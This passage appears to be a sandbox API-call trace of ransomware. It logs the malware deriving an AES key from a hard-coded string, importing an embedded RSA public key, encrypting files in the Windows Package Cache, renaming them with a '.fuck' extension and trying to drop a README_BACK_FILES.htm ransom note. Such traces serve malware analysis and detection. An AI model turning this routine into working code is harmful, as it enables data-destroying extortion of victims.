pInfo=0x29050d8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2905108*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2905110*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e7338) returned 1 [0240.871] CryptEncrypt (in: hKey=0x28e7338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.871] CryptEncrypt (in: hKey=0x28e7338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f2278*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f2278*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.871] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f2278, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.871] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.871] CryptEncrypt (in: hKey=0x28e7ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.871] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.871] CloseHandle (hObject=0xffffffff) returned 1 [0240.871] CloseHandle (hObject=0xffffffff) returned 1 [0240.871] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), bFailIfExists=0) returned 0 [0240.872] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab", dwFileAttributes=0x0) returned 0 [0240.872] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab.gsg")) returned 0 [0240.873] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.fuck" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab.fuck")) returned 0 [0240.873] CryptDestroyHash (hHash=0x28e7238) returned 1 [0240.873] CryptDestroyKey (hKey=0x28e7ab8) returned 1 [0240.873] CryptReleaseContext (hProv=0x28f26b8, dwFlags=0x0) returned 1 [0240.874] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.874] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.874] GetLastError () returned 0x5 [0240.874] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi")) returned 0x20 [0240.874] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi", dwFileAttributes=0x80) returned 0 [0240.874] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.875] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.875] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg", dwFileAttributes=0x2) returned 0 [0240.876] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f1f48) returned 1 [0240.878] CryptCreateHash (in: hProv=0x28f1f48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.878] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.878] CryptHashData (hHash=0x28e7538, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.878] CryptDeriveKey (in: hProv=0x28f1f48, Algid=0x6610, hBaseData=0x28e7538, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e7738) returned 1 [0240.879] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.879] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.879] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f2058) returned 1 [0240.879] CryptImportPublicKeyInfo (in: hCryptProv=0x28f2058, dwCertEncodingType=0x1, pInfo=0x2904b28*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2904b58*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2904b60*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e7ab8) returned 1 [0240.880] CryptEncrypt (in: hKey=0x28e7ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.880] CryptEncrypt (in: hKey=0x28e7ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f2850*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f2850*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.880] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f2850, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.880] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.880] CryptEncrypt (in: hKey=0x28e7738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.880] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.880] CloseHandle (hObject=0xffffffff) returned 1 [0240.880] CloseHandle (hObject=0xffffffff) returned 1 [0240.880] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), bFailIfExists=0) returned 0 [0240.881] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi", dwFileAttributes=0x0) returned 0 [0240.882] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.gsg")) returned 0 [0240.882] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.fuck" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.fuck")) returned 0 [0240.883] CryptDestroyHash (hHash=0x28e7538) returned 1 [0240.883] CryptDestroyKey (hKey=0x28e7738) returned 1 [0240.883] CryptReleaseContext (hProv=0x28f1f48, dwFlags=0x0) returned 1 [0240.883] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0240.883] FindClose (in: hFindFile=0x28e8578 | out: hFindFile=0x28e8578) returned 1 [0240.883] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\readme_back_files.htm")) returned 0xffffffff [0240.884] AreFileApisANSI () returned 1 [0240.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28db598, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 136 [0240.884] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.884] GetLastError () returned 0x5 [0240.884] GetLastError () returned 0x5 [0240.884] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.884] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.885] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\readme_back_files.htm")) returned 0xffffffff [0240.885] AreFileApisANSI () returned 1 [0240.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f6348, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 115 [0240.885] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.885] GetLastError () returned 0x5 [0240.885] GetLastError () returned 0x5 [0240.885] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.885] FindClose (in: hFindFile=0x28e8638 | out: hFindFile=0x28e8638) returned 1 [0240.886] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\readme_back_files.htm")) returned 0xffffffff [0240.886] AreFileApisANSI () returned 1 [0240.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2940, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 106 [0240.886] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.886] GetLastError () returned 0x5 [0240.886] GetLastError () returned 0x5 [0240.886] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.887] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e84f8 [0240.887] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.887] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.887] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e8578 [0240.887] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.887] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.887] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e8638 [0240.887] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.888] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.888] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.888] GetLastError () returned 0x5 [0240.888] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\cab1.cab")) returned 0x20 [0240.888] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0240.888] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.889] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.889] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0240.890] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f1420) returned 1 [0240.894] CryptCreateHash (in: hProv=0x28f1420, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.894] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.894] CryptHashData (hHash=0x28e7238, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.894] CryptDeriveKey (in: hProv=0x28f1420, Algid=0x6610, hBaseData=0x28e7238, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e73b8) returned 1 [0240.894] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----d", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.894] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.894] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f2498) returned 1 [0240.895] CryptImportPublicKeyInfo (in: hCryptProv=0x28f2498, dwCertEncodingType=0x1, pInfo=0x2904d98*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2904dc8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2904dd0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e7578) returned 1 [0240.895] CryptEncrypt (in: hKey=0x28e7578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.895] CryptEncrypt (in: hKey=0x28e7578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f1ca0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f1ca0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.895] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f1ca0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.895] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.895] CryptEncrypt (in: hKey=0x28e73b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.895] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.895] CloseHandle (hObject=0xffffffff) returned 1 [0240.895] CloseHandle (hObject=0xffffffff) returned 1 [0240.895] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\cab1.cab.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\cab1.cab"), bFailIfExists=0) returned 0 [0240.896] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab", dwFileAttributes=0x0) returned 0 [0240.896] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\cab1.cab.gsg")) returned 0 [0240.897] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab.fuck" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\cab1.cab.fuck")) returned 0 [0240.898] CryptDestroyHash (hHash=0x28e7238) returned 1 [0240.898] CryptDestroyKey (hKey=0x28e73b8) returned 1 [0240.898] CryptReleaseContext (hProv=0x28f1420, dwFlags=0x0) returned 1 [0240.898] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.898] GetSystemTimePreciseAsFileTime 